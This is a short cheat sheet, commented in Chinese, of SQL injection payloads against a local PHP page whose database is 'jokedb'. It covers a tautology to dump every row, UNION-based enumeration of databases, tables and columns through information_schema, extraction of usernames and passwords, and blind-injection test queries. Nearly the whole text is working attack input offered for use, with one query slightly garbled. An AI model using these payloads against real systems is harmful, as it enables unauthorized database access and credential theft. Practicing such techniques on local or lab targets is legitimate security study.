http://localhost/index.php?id=33 UNION SELECT 1,user,pass,4 from jokedb.users
//查询所有数据
http://localhost/index.php?id=0 or 1=1
--UNION注入破解用户名密码
select TABLE_SCHEMA FROM information_ schema.TABLES //数据库名称
//猜测表名
http://localhost/index.php?id=33 UNION select 1,TABLE_NAME,3,4 FROM information_schema.TABLES where TABLE_SCHEMA='jokedb'
//猜测字段名
select column_name from information_schema.columns where TABLE_SCHEMA='jokedb' and TABLE_NAME='users';
//查询用户名密码
http://localhost/index.php?id=33 UNION SELECT 1,user,pass,4 from jokedb.users
//盲注函数
select if(1=1,'tiger','monkey')
//猜表名是否存在
SELECT * FROM region WHERE (id = 33) and 1<(select count(*) from jokedb.xss )